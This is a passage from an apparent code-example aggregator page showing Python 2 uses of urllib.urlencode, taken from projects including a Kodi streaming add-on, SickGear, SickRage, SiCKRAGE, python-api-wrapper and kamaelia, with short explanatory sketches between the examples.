		req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
		response = urllib2.urlopen(req)
		link=response.read()
		response.close()
		match =re.findall('"http.*(ebound).*?\?site=(.*?)"',link,  re.IGNORECASE)[0]
		cName=match[1]
		progress.update( 20, "", "Finding links..", "" )

	else:
		cName=url
	#match =re.findall('"http.*(ebound).*?\?site=(.*?)"',link,  re.IGNORECASE)[0]


	
	newURL='http://www.eboundservices.com/iframe/newads/iframe.php?stream='+ cName+'&width=undefined&height=undefined&clip=' + cName
	print newURL

	
	req = urllib2.Request(newURL)
	req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
	response = urllib2.urlopen(req)
	link=response.read()
	response.close()
	progress.update( 50, "", "Finding links..", "" )

	
#	match =re.findall('<iframe.+src=\'(.*)\' frame',link,  re.IGNORECASE)
#	print match
#	req = urllib2.Request(match[0])
#	req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
#	response = urllib2.urlopen(req)
#	link=response.read()
#	response.close()
	time = 2000  #in milliseconds
	defaultStreamType=0 #0 RTMP,1 HTTP
	defaultStreamType=selfAddon.getSetting( "DefaultStreamType" ) 
	print 'defaultStreamType',defaultStreamType
	if 1==2 and (linkType=="HTTP" or (linkType=="" and defaultStreamType=="1")): #disable http streaming for time being
#	print link
		line1 = "Playing Http Stream"
		xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,line1, time, __icon__))
		
		match =re.findall('MM_openBrWindow\(\'(.*)\',\'ebound\'', link,  re.IGNORECASE)
			
	#	print url
	#	print match
		
		strval = match[0]
		
		#listitem = xbmcgui.ListItem(name)
		#listitem.setInfo('video', {'Title': name, 'Genre': 'Live TV'})
		#playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO )
		#playlist.clear()
		#playlist.add (strval)
		
		#xbmc.Player().play(playlist)
		listitem = xbmcgui.ListItem( label = str(cName), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=strval )
		print "playing stream name: " + str(cName) 
		listitem.setInfo( type="video", infoLabels={ "Title": cName, "Path" : strval } )
		listitem.setInfo( type="video", infoLabels={ "Title": cName, "Plot" : cName, "TVShowTitle": cName } )
		xbmc.Player().play( str(strval), listitem)
	else:
		line1 = "Playing RTMP Stream"
		xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,line1, time, __icon__))
		progress.update( 60, "", "Finding links..", "" )

		post = {'username':'hash'}
		post = urllib.urlencode(post)
		req = urllib2.Request('http://eboundservices.com/flashplayerhash/index.php')
		req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36')
		response = urllib2.urlopen(req,post)
		link=response.read()
		response.close()
		

        
		print link
		#match =re.findall("=(.*)", link)

		#print url
		#print match

		strval =link # match[0]

		#listitem = xbmcgui.ListItem(name)
		#listitem.setInfo('video', {'Title': name, 'Genre': 'Live TV'})
		#playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO )
		#playlist.clear()
		#playlist.add (strval)

		playfile='rtmp://cdn.ebound.tv/tv?wmsAuthSign=/%s app=tv?wmsAuthSign=?%s swfurl=http://www.eboundservices.com/live/v6/player.swf?domain=&channel=%s&country=GB pageUrl=http://www.eboundservices.com/iframe/newads/iframe.php?stream=%s tcUrl=rtmp://cdn.ebound.tv/tv?wmsAuthSign=?%s live=true timeout=15'	% (cName,strval,cName,cName,strval)
		#playfile='rtmp://cdn.ebound.tv/tv?wmsAuthSign=/humtv app=tv?wmsAuthSign=?%s swfurl=http://www.eboundservices.com/live/v6/player.swf?domain=&channel=humtv&country=GB pageUrl=http://www.eboundservices.com/iframe/newads/iframe.php?stream=humtv tcUrl=rtmp://cdn.ebound.tv/tv?wmsAuthSign=?%s live=true'	% (strval,strval)
		progress.update( 100, "", "Almost done..", "" )
		print playfile
		#xbmc.Player().play(playlist)
		listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ) )
		print "playing stream name: " + str(name) 
		#listitem.setInfo( type="video", infoLabels={ "Title": name, "Path" : playfile } )
		#listitem.setInfo( type="video", infoLabels={ "Title": name, "Plot" : name, "TVShowTitle": name } )
		xbmc.Player(  ).play( playfile, listitem)
		#xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, listitem)

	return
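
A minimal sketch of the hash-request POST above, assuming Python 2 and a hypothetical endpoint; passing the urlencoded dict as the second argument to urlopen() turns the request into a POST:

import urllib
import urllib2

post = urllib.urlencode({'username': 'hash'})
req = urllib2.Request('http://example.com/flashplayerhash/index.php')
req.add_header('User-Agent', 'Mozilla/5.0')
# urllib2.urlopen(req, post) would send the encoded dict as the POST body.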

Example 32

Project: SickGear
Source File: newznab.py
View license
    def _search_provider(self, search_params, **kwargs):

        api_key = self._check_auth()

        base_params = {'t': 'tvsearch',
                       'maxage': sickbeard.USENET_RETENTION or 0,
                       'limit': 100,
                       'attrs': 'rageid',
                       'offset': 0}

        if isinstance(api_key, basestring):
            base_params['apikey'] = api_key

        results = []
        total, cnt, search_url, exit_log = 0, len(results), '', False

        for mode in search_params.keys():
            for i, params in enumerate(search_params[mode]):

                # category ids
                cat = []
                cat_anime = ('5070', '6070')['nzbs_org' == self.get_id()]
                cat_sport = '5060'
                if 'Episode' == mode or 'Season' == mode:
                    if not ('rid' in params or 'tvdbid' in params or 'q' in params or not self.supports_tvdbid()):
                        logger.log('Error no rid, tvdbid, or search term available for search.')
                        continue

                    if self.show:
                        if self.show.is_sports:
                            cat = [cat_sport]
                        elif self.show.is_anime:
                            cat = [cat_anime]
                else:
                    cat = [cat_sport, cat_anime]

                if self.cat_ids or len(cat):
                    base_params['cat'] = ','.join(sorted(set(self.cat_ids.split(',') + cat)))

                request_params = base_params.copy()
                request_params.update(params)

                offset = 0
                batch_count = not 0

                # hardcoded to stop after a max of 4 hits (400 items) per query
                while (offset <= total) and (offset < (200, 400)[self.supports_tvdbid()]) and batch_count:
                    cnt = len(results)
                    search_url = '%sapi?%s' % (self.url, urllib.urlencode(request_params))

                    data = self.cache.getRSSFeed(search_url)
                    i and time.sleep(1.1)

                    if not data or not self.check_auth_from_data(data):
                        break

                    for item in data.entries:

                        title, url = self._title_and_url(item)
                        if title and url:
                            results.append(item)
                        else:
                            logger.log(u'The data returned from %s is incomplete, this result is unusable' % self.name,
                                       logger.DEBUG)

                    # get total and offset attribs
                    try:
                        if 0 == total:
                            total = int(data.feed.newznab_response['total'] or 0)
                            hits = (total / 100 + int(0 < (total % 100)))
                            hits += int(0 == hits)
                        offset = int(data.feed.newznab_response['offset'] or 0)
                    except AttributeError:
                        break

                    # No items found, prevent from doing another search
                    if 0 == total:
                        break

                    # Cache mode, prevent from doing another search
                    if 'Cache' == mode:
                        exit_log = True
                        break

                    if offset != request_params['offset']:
                        logger.log('Tell your newznab provider to fix their bloody newznab responses')
                        break

                    request_params['offset'] += request_params['limit']
                    if total <= request_params['offset']:
                        exit_log = True
                        logger.log('%s item%s found that will be used for episode matching' % (total, helpers.maybe_plural(total)),
                                   logger.DEBUG)
                        break

                    # there are more items available than the amount given in one call, grab some more
                    items = total - request_params['offset']
                    logger.log('%s more item%s to fetch from a batch of up to %s items.'
                               % (items, helpers.maybe_plural(items), request_params['limit']), logger.DEBUG)

                    batch_count = self._log_result(results, mode, cnt, search_url)

                if exit_log:
                    self._log_result(results, mode, cnt, search_url)
                    exit_log = False

                if 'tvdbid' in request_params and len(results):
                    break

        return results
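
A minimal sketch of the newznab search URL above, assuming Python 2 and a placeholder indexer and API key; urllib.urlencode() serialises the request parameters into the query string appended to "api?":

import urllib

request_params = {'t': 'tvsearch', 'maxage': 0, 'limit': 100,
                  'attrs': 'rageid', 'offset': 0,
                  'apikey': 'dummy-key', 'cat': '5030,5040'}
search_url = '%sapi?%s' % ('https://indexer.example.com/',
                           urllib.urlencode(request_params))
print search_url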

Example 33

Project: SickRage
Source File: pushover.py
View license
    def _sendPushover(self, msg, title, sound=None, userKey=None, apiKey=None):
        """
        Sends a pushover notification to the address provided

        msg: The message to send (unicode)
        title: The title of the message
        sound: The notification sound to use
        userKey: The pushover user id to send the message to (or to subscribe with)
        apiKey: The pushover api key to use
        returns: True if the message succeeded, False otherwise
        """

        if userKey is None:
            userKey = sickbeard.PUSHOVER_USERKEY

        if apiKey is None:
            apiKey = sickbeard.PUSHOVER_APIKEY

        if sound is None:
            sound = sickbeard.PUSHOVER_SOUND

        logger.log(u"Pushover API KEY in use: " + apiKey, logger.DEBUG)

        # build up the URL and parameters
        msg = msg.strip()

        # send the request to pushover
        try:
            if sickbeard.PUSHOVER_SOUND != "default":
                args = {
                    "token": apiKey,
                    "user": userKey,
                    "title": title.encode('utf-8'),
                    "message": msg.encode('utf-8'),
                    "timestamp": int(time.time()),
                    "retry": 60,
                    "expire": 3600,
                    "sound": sound,
                }
            else:
                # sound is default, so don't send it
                args = {
                    "token": apiKey,
                    "user": userKey,
                    "title": title.encode('utf-8'),
                    "message": msg.encode('utf-8'),
                    "timestamp": int(time.time()),
                    "retry": 60,
                    "expire": 3600,
                }

            if sickbeard.PUSHOVER_DEVICE:
                args["device"] = sickbeard.PUSHOVER_DEVICE

            conn = httplib.HTTPSConnection("api.pushover.net:443")
            conn.request("POST", "/1/messages.json",
                         urllib.urlencode(args), {"Content-type": "application/x-www-form-urlencoded"})

        except urllib2.HTTPError as e:
            # if we get an error back that doesn't have an error code then who knows what's really happening
            if not hasattr(e, 'code'):
                logger.log(u"Pushover notification failed." + ex(e), logger.ERROR)
                return False
            else:
                logger.log(u"Pushover notification failed. Error code: " + str(e.code), logger.ERROR)

            # HTTP status 404 if the provided email address isn't a Pushover user.
            if e.code == 404:
                logger.log(u"Username is wrong/not a pushover email. Pushover will send an email to it", logger.WARNING)
                return False

            # For HTTP status code 401's, it is because you are passing in either an invalid token, or the user has not added your service.
            elif e.code == 401:

                # HTTP status 401 if the user doesn't have the service added
                subscribeNote = self._sendPushover(msg, title, sound=sound, userKey=userKey, apiKey=apiKey)
                if subscribeNote:
                    logger.log(u"Subscription sent", logger.DEBUG)
                    return True
                else:
                    logger.log(u"Subscription could not be sent", logger.ERROR)
                    return False

            # If you receive an HTTP status code of 400, it is because you failed to send the proper parameters
            elif e.code == 400:
                logger.log(u"Wrong data sent to pushover", logger.ERROR)
                return False

            # If you receive a HTTP status code of 429, it is because the message limit has been reached (free limit is 7,500)
            elif e.code == 429:
                logger.log(u"Pushover API message limit reached - try a different API key", logger.ERROR)
                return False

        logger.log(u"Pushover notification successful.", logger.INFO)
        return True
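
A minimal sketch of the Pushover POST above, assuming Python 2 and dummy token/user keys (the live API will reject them); urllib.urlencode() produces the form-encoded request body:

import httplib
import time
import urllib

args = {"token": "dummy-api-key",
        "user": "dummy-user-key",
        "title": "Test",
        "message": "Hello from urlencode",
        "timestamp": int(time.time()),
        "retry": 60,
        "expire": 3600}
conn = httplib.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json", urllib.urlencode(args),
             {"Content-type": "application/x-www-form-urlencoded"})
print conn.getresponse().status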

Example 34

Project: SiCKRAGE
Source File: sabnzbd.py
View license
    @staticmethod
    def sendNZB(nzb):
        """
        Sends an NZB to SABnzbd via the API.

        :param nzb: The NZBSearchResult object to send to SAB
        """

        # set up a dict with the URL params in it
        params = {}
        if sickrage.srCore.srConfig.SAB_USERNAME is not None:
            params['ma_username'] = sickrage.srCore.srConfig.SAB_USERNAME
        if sickrage.srCore.srConfig.SAB_PASSWORD is not None:
            params['ma_password'] = sickrage.srCore.srConfig.SAB_PASSWORD
        if sickrage.srCore.srConfig.SAB_APIKEY is not None:
            params['apikey'] = sickrage.srCore.srConfig.SAB_APIKEY
        category = sickrage.srCore.srConfig.SAB_CATEGORY
        if nzb.show.is_anime:
            category = sickrage.srCore.srConfig.SAB_CATEGORY_ANIME

        # if it aired more than 7 days ago, override with the backlog category IDs
        for curEp in nzb.episodes:
            if datetime.date.today() - curEp.airdate > datetime.timedelta(days=7):
                category = sickrage.srCore.srConfig.SAB_CATEGORY_BACKLOG
                if nzb.show.is_anime:
                    category = sickrage.srCore.srConfig.SAB_CATEGORY_ANIME_BACKLOG

        if category is not None:
            params['cat'] = category

        # use high priority if specified (recently aired episode)
        if nzb.priority == 1:
            if sickrage.srCore.srConfig.SAB_FORCED == 1:
                params['priority'] = 2
            else:
                params['priority'] = 1

        try:
            f = None

            # if it's a normal result we just pass SAB the URL
            if nzb.resultType == "nzb":
                # for newzbin results send the ID to sab specifically
                if nzb.provider.id == 'newzbin':
                    id = nzb.provider.getIDFromURL(nzb.url)
                    if not id:
                        sickrage.srCore.srLogger.error("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url))
                        return False
                    params['mode'] = 'addid'
                    params['name'] = id
                else:
                    params['mode'] = 'addurl'
                    params['name'] = nzb.url

                url = sickrage.srCore.srConfig.SAB_HOST + "api?" + urllib.urlencode(params)
                sickrage.srCore.srLogger.info("Sending NZB to SABnzbd")
                sickrage.srCore.srLogger.debug("URL: " + url)

                # if we have the URL to an NZB then we've built up the SAB API URL already so just call it
                if nzb.resultType == "nzb":
                    f = urllib.urlopen(url)

            elif nzb.resultType == "nzbdata":
                params['mode'] = 'addfile'
                multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

                url = sickrage.srCore.srConfig.SAB_HOST + "api?" + urllib.urlencode(params)
                sickrage.srCore.srLogger.info("Sending NZB to SABnzbd")
                sickrage.srCore.srLogger.debug("URL: " + url)

                cookies = cookielib.CookieJar()
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                              MultipartPostHandler.MultipartPostHandler)
                req = urllib2.Request(url, multiPartParams, headers={'User-Agent': sickrage.srCore.srConfig.USER_AGENT})
                f = opener.open(req)

        except (EOFError, IOError) as e:
            sickrage.srCore.srLogger.error("Unable to connect to SAB: {}".format(e.message))
            return False
        except httplib.InvalidURL as e:
            sickrage.srCore.srLogger.error("Invalid SAB host, check your config: {}".format(e.message))
            return False

        # this means we couldn't open the connection or something just as bad
        if f is None:
            sickrage.srCore.srLogger.error("No data returned from SABnzbd, NZB not sent")
            return False

        # if we opened the URL connection then read the result from SAB
        try:
            result = f.readlines()
        except Exception as e:
            sickrage.srCore.srLogger.error("Error trying to get result from SAB, NZB not sent: {}".format(e.message))
            return False

        # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't receive the NZB
        if len(result) == 0:
            sickrage.srCore.srLogger.error("No data returned from SABnzbd, NZB not sent")
            return False

        # massage the result a little bit
        sabText = result[0].strip()

        sickrage.srCore.srLogger.debug("Result text from SAB: " + sabText)

        # do some crude parsing of the result text to determine what SAB said
        if sabText == "ok":
            sickrage.srCore.srLogger.debug("NZB sent to SAB successfully")
            return True
        elif sabText == "Missing authentication":
            sickrage.srCore.srLogger.error("Incorrect username/password sent to SAB, NZB not sent")
            return False
        else:
            sickrage.srCore.srLogger.error("Unknown failure sending NZB to sab. Return text is: " + sabText)
            return False
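
A minimal sketch of the 'addfile' branch above, assuming Python 2 and a placeholder host and key; urllib.urlencode() only builds the query string, while the NZB payload itself is posted as multipart form data via MultipartPostHandler:

import urllib

params = {'mode': 'addfile', 'apikey': '0123456789abcdef', 'cat': 'tv'}
url = 'http://localhost:8080/sabnzbd/api?' + urllib.urlencode(params)
multiPartParams = {'nzbfile': ('episode.nzb', '<nzb>...</nzb>')}
print url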

Example 35

Project: python-api-wrapper
Source File: __init__.py
View license
    def _call(self, method, *args, **kwargs):
        """
        The workhorse. It's complicated, convoluted and beyond understanding of a mortal being.

        You have been warned.
        """

        queryparams = {}
        __offset__ = ApiConnector.LIST_LIMIT
        if "__offset__" in kwargs:
            offset = kwargs.pop("__offset__")
            queryparams['offset'] = offset
            __offset__ = offset + ApiConnector.LIST_LIMIT

        if "params" in kwargs:
            queryparams.update(kwargs.pop("params"))

        # create a closure to invoke this method again with a greater offset
        _cl_method = method
        _cl_args = tuple(args)
        _cl_kwargs = {}
        _cl_kwargs.update(kwargs)
        _cl_kwargs["__offset__"] = __offset__
        def continue_list_fetching():
            return self._call(method, *_cl_args, **_cl_kwargs)
        connector = self._get_connector()
        def filelike(v):
            if isinstance(v, file):
                return True
            if hasattr(v, "read"):
                return True
            return False 
        alternate_http_method = None
        if "_alternate_http_method" in kwargs:
            alternate_http_method = kwargs.pop("_alternate_http_method")
        urlparams = kwargs if kwargs else None
        use_multipart = False
        if urlparams is not None:
            fileargs = dict((key, value) for key, value in urlparams.iteritems() if filelike(value))
            use_multipart = bool(fileargs)

        # ensure the method has a trailing /
        if method[-1] != "/":
            method = method + "/"
        if args:
            method = "%s%s" % (method, "/".join(str(a) for a in args))

        scope = ''
        if self._scope:
            scopes = self._scope
            if connector.collapse_scope:
                scopes = scopes[-1:]
            scope = "/".join([sc._scope() for sc in scopes]) + "/"
        url = "http://%(host)s/%(base)s%(scope)s%(method)s%(queryparams)s" % dict(host=connector.host, method=method, base=connector._base, scope=scope, queryparams=self._create_query_string(queryparams))

        # we need to install SCRedirectHandler
        # to gather possible See-Other redirects
        # so that we can exchange our method
        redirect_handler = SCRedirectHandler()
        handlers = [redirect_handler]
        if USE_PROXY:
            handlers.append(urllib2.ProxyHandler({'http' : PROXY}))
        req = self._create_request(url, connector, urlparams, queryparams, alternate_http_method, use_multipart)

        http_method = req.get_method()
        if urlparams is not None:
            logger.debug("Posting url: %s, method: %s", url, http_method)
        else:
            logger.debug("Fetching url: %s, method: %s", url, http_method)

            
        if use_multipart:
            handlers.extend([MultipartPostHandler])            
        else:
            if urlparams is not None:
                urlparams = urllib.urlencode(urlparams.items(), True)
        opener = urllib2.build_opener(*handlers)
        try:
            handle = opener.open(req, urlparams)
        except NoResultFromRequest:
            return None
        except urllib2.HTTPError, e:
            if http_method == "GET" and e.code == 404:
                return None
            raise

        info = handle.info()
        ct = info['Content-Type']
        content = handle.read()
        logger.debug("Content-type:%s", ct)
        logger.debug("Request Content:\n%s", content)
        if redirect_handler.alternate_method is not None:
            method = connector.normalize_method(redirect_handler.alternate_method)
            logger.debug("Method changed through redirect to: <%s>", method)

        try:
            if "application/json" in ct:
                content = content.strip()
                #If linked partitioning is on, extract the URL to the next collection:
                partition_url = None
                if method.find('linked_partitioning=1') != -1:  
                  pattern = re.compile('(next_partition_href":")(.*?)(")')
                  if pattern.search(content):
                    partition_url = pattern.search(content).group(2)

                if not content:
                    content = "{}"
                try:
                    res = simplejson.loads(content)                    
                except:
                    logger.error("Couldn't decode returned json")
                    logger.error(content)
                    raise
                res = self._map(res, method, continue_list_fetching, partition_url)
                return res
            elif len(content) <= 1:
                # this might be the famous SeeOtherSpecialCase which means that
                # all that matters is just the method
                pass
            raise UnknownContentType("%s, returned:\n%s" % (ct, content))
        finally:
            handle.close()
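
A minimal sketch of the urlencode call above, assuming Python 2; passing True as the second (doseq) argument expands sequence values into repeated key=value pairs instead of quoting the whole list:

import urllib

urlparams = {'tags': ['electro', 'house'], 'limit': 10}
print urllib.urlencode(urlparams.items(), True)
# e.g. tags=electro&tags=house&limit=10 (key order may vary)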

Example 36

Project: kamaelia_
Source File: TwitterStream.oauth.py
View license
    def main(self):
        twitterurl = "http://stream.twitter.com/1/statuses/filter.json"

        # Configure authentication for Twitter - temporary until OAuth implemented
        #passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        #passman.add_password(None, twitterurl, self.username, self.password)
        #authhandler = urllib2.HTTPBasicAuthHandler(passman)

        # Configure proxy and opener
        if self.proxy:
            proxyhandler = urllib2.ProxyHandler({"http" : self.proxy})
            twitopener = urllib2.build_opener(proxyhandler)
        #else:
        #    twitopener = urllib2.build_opener(authhandler)


        headers = {'User-Agent' : "BBC R&D Grabber"}
        postdata = None

        if self.keypair == False:
            # Perform OAuth authentication
            request_token_url = 'http://api.twitter.com/oauth/request_token'
            access_token_url = 'http://api.twitter.com/oauth/access_token'
            authorize_url = 'http://api.twitter.com/oauth/authorize'

            token = None
            consumer = oauth.Consumer(key=self.consumerkeypair[0],secret=self.consumerkeypair[1])

            params = {
                        'oauth_version': "1.0",
                        'oauth_nonce': oauth.generate_nonce(),
                        'oauth_timestamp': int(time.time()),
                    }

            params['oauth_consumer_key'] = consumer.key

            req = oauth.Request(method="GET",url=request_token_url,parameters=params)

            signature_method = oauth.SignatureMethod_HMAC_SHA1()
            req.sign_request(signature_method, consumer, token)

            requestheaders = req.to_header()
            requestheaders['User-Agent'] = "BBC R&D Grabber"

            # Connect to Twitter
            try:
                req = urllib2.Request(request_token_url,None,requestheaders) # Why won't this work?!? Is it trying to POST?
                conn1 = urllib2.urlopen(req)
            except httplib.BadStatusLine, e:
                sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                conn1 = False
            except urllib2.HTTPError, e:
                sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                conn1 = False
            except urllib2.URLError, e:
                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                conn1 = False

            if conn1:
                content = conn1.read()
                conn1.close()
            #resp, content = client.request(request_token_url, "POST")
            #if resp['status'] != '200':
            #    raise Exception("Invalid response %s." % resp['status'])

                request_token = dict(urlparse.parse_qsl(content))

                print "Request Token:"
                print "     - oauth_token        = %s" % request_token['oauth_token']
                print "     - oauth_token_secret = %s" % request_token['oauth_token_secret']
                print

                # The user must confirm authorisation so a URL is printed here
                print "Go to the following link in your browser:"
                print "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
                print

                accepted = 'n'
                # Wait until the user has confirmed authorisation
                while accepted.lower() == 'n':
                    accepted = raw_input('Have you authorized me? (y/n) ')
                oauth_verifier = raw_input('What is the PIN? ')

                token = oauth.Token(request_token['oauth_token'],
                    request_token['oauth_token_secret'])
                token.set_verifier(oauth_verifier)
                #client = oauth.Client(consumer,token)
                params = {
                        'oauth_version': "1.0",
                        'oauth_nonce': oauth.generate_nonce(),
                        'oauth_timestamp': int(time.time()),
                        #'user': self.username
                    }

                params['oauth_token'] = token.key
                params['oauth_consumer_key'] = consumer.key

                req = oauth.Request(method="GET",url=access_token_url,parameters=params)

                signature_method = oauth.SignatureMethod_HMAC_SHA1()
                req.sign_request(signature_method, consumer, token)

                requestheaders = req.to_header()
                requestheaders['User-Agent'] = "BBC R&D Grabber"
                # Connect to Twitter
                try:
                    req = urllib2.Request(access_token_url,"oauth_verifier=%s" % oauth_verifier,requestheaders) # Why won't this work?!? Is it trying to POST?
                    conn1 = urllib2.urlopen(req)
                except httplib.BadStatusLine, e:
                    sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    conn1 = False

                if conn1:
                    content = conn1.read()
                    conn1.close()
                    access_token = dict(urlparse.parse_qsl(content))

                    # Access tokens retrieved from Twitter
                    print "Access Token:"
                    print "     - oauth_token        = %s" % access_token['oauth_token']
                    print "     - oauth_token_secret = %s" % access_token['oauth_token_secret']
                    print
                    print "You may now access protected resources using the access tokens above."
                    print

                    save = False
                    # Load config to save OAuth keys
                    try:
                        homedir = os.path.expanduser("~")
                        file = open(homedir + "/twitter-login.conf",'r')
                        save = True
                    except IOError, e:
                        print ("Failed to load config file - not saving oauth keys: " + str(e))

                    if save:
                        raw_config = file.read()

                        file.close()

                        # Read config and add new values
                        config = cjson.decode(raw_config)
                        config['key'] = access_token['oauth_token']

                        config['secret'] = access_token['oauth_token_secret']

                        raw_config = cjson.encode(config)

                        # Write out the new config file
                        try:
                            file = open(homedir + "/twitter-login.conf",'w')
                            file.write(raw_config)
                            file.close()
                        except IOError, e:
                            print ("Failed to save oauth keys: " + str(e))

                    self.keypair = [access_token['oauth_token'], access_token['oauth_token_secret']]


        while not self.finished():
            if self.dataReady("inbox"):

                # Receive keywords and PIDs
                recvdata = self.recv("inbox")
                keywords = recvdata[0]

                # Abide by Twitter's keyword limit of 400
                if len(keywords) > 400:
                    sys.stderr.write('TwitterStream keyword list too long - sending shortened list\n')
                    keywords = keywords[0:400:1]
                    
                pids = recvdata[1]

                # Create POST data
                data = urllib.urlencode({"track": ",".join(keywords)})
                print ("Got keywords: " + data)

                # If using firehose, filtering based on keywords will be carried out AFTER grabbing data
                # This will be done here rather than by Twitter

                # Get ready to grab Twitter data
                urllib2.install_opener(twitopener)

                params = {
                    'oauth_version': "1.0",
                    'oauth_nonce': oauth.generate_nonce(),
                    'oauth_timestamp': int(time.time()),
                    #'user': self.username
                }

                token = oauth.Token(key=self.keypair[0],secret=self.keypair[1])
                consumer = oauth.Consumer(key=self.consumerkeypair[0],secret=self.consumerkeypair[1])

                params['oauth_token'] = token.key
                params['oauth_consumer_key'] = consumer.key

                req = oauth.Request(method="POST",url=twitterurl,parameters=params)

                signature_method = oauth.SignatureMethod_HMAC_SHA1()
                req.sign_request(signature_method, consumer, token)

                requestheaders = req.to_header()
                requestheaders['User-Agent'] = "BBC R&D Grabber"
                requestheaders['Keep-Alive'] = self.timeout
                requestheaders['Connection'] = "Keep-Alive"
                print requestheaders

                # Identify the client and add a keep alive message using the same timeout assigned to the socket
                #headers = {'User-Agent' : "BBC R&D Grabber", "Keep-Alive" : self.timeout, "Connection" : "Keep-Alive"}

                # Connect to Twitter
                try:
                    req = urllib2.Request(twitterurl,data,requestheaders)
                    conn1 = urllib2.urlopen(req,None,self.timeout)
                    self.backofftime = 1 # Reset the backoff time
                    print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                    file = open("streamDebug.txt", 'r')
                    filecontents = file.read()
                    file.close()
                    file = open("streamDebug.txt", 'w')
                    file.write(filecontents + "\n" + str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                    file.close()
                except httplib.BadStatusLine, e:
                    sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                    sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                    # Major error assumed - long backoff
                    if e.code > 200:
                        if self.backofftime == 1:
                            self.backofftime = 10
                        else:
                            self.backofftime *= 2
                        if self.backofftime > 240:
                            self.backofftime = 240
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except socket.timeout, e:
                    sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False

                if conn1:
                    # While no new keywords have been passed in...
                    while not self.dataReady("inbox"):
                        # Collect data from the streaming API as it arrives - separated by carriage returns.
                        try:
                            content = ""
                            # Timer attempt to fix connection hanging
                            # Could possibly force this to generate an exception otherwise - can't be sure if that will stop the read though
                            readtimer = Timer(self.timeout,conn1.close)
                            readtimer.start()
                            while not "\r\n" in content: # Twitter specified watch characters - readline doesn't catch this properly
                                content += conn1.read(1)
                            readtimer.cancel()
                            # Below modified to ensure reconnection is attempted if the timer expires
                            if "\r\n" in content:
                                self.send([content,pids],"outbox") # Send to data collector / analyser rather than back to requester
                                failed = False
                            else:
                                failed = True
                        except IOError, e:
                            sys.stderr.write('TwitterStream IO error: ' + str(e) + '\n')
                            failed = True
                        except Axon.AxonExceptions.noSpaceInBox, e:
                            # Ignore data - no space to send out
                            sys.stderr.write('TwitterStream no space in box error: ' + str(e) + '\n')
                            failed = True
                        except socket.timeout, e:
                            sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                            # General network error assumed - short backoff
                            self.backofftime += 1
                            if self.backofftime > 16:
                                self.backofftime = 16
                            failed = True
                        except TypeError, e:
                            # This pretty much means the connection failed - so let's deal with it
                            sys.stderr.write('TwitterStream TypeError - conn1 failure: ' + str(e) + '\n')
                            failed = True
                        if failed == True and self.reconnect == True:
                            # Reconnection procedure
                            print (str(datetime.utcnow()) + " Streaming API connection failed.")
                            file = open("streamDebug.txt", 'r')
                            filecontents = file.read()
                            file.close()
                            file = open("streamDebug.txt", 'w')
                            file.write(filecontents + "\n" + str(datetime.utcnow()) + " Streaming API connection failed")
                            file.close()
                            conn1.close()
                            if self.backofftime > 1:
                                print ("Backing off for " + str(self.backofftime) + " seconds.")
                            time.sleep(self.backofftime)
                            print (str(datetime.utcnow()) + " Attempting reconnection...")
                            file = open("streamDebug.txt", 'r')
                            filecontents = file.read()
                            file.close()
                            file = open("streamDebug.txt", 'w')
                            file.write(filecontents + "\n" + str(datetime.utcnow()) + " Attempting reconnection...")
                            file.close()
                            try:
                                urllib2.install_opener(twitopener)
                                req = urllib2.Request(twitterurl,data,headers)
                                conn1 = urllib2.urlopen(req,None,self.timeout)
                                self.backofftime = 1
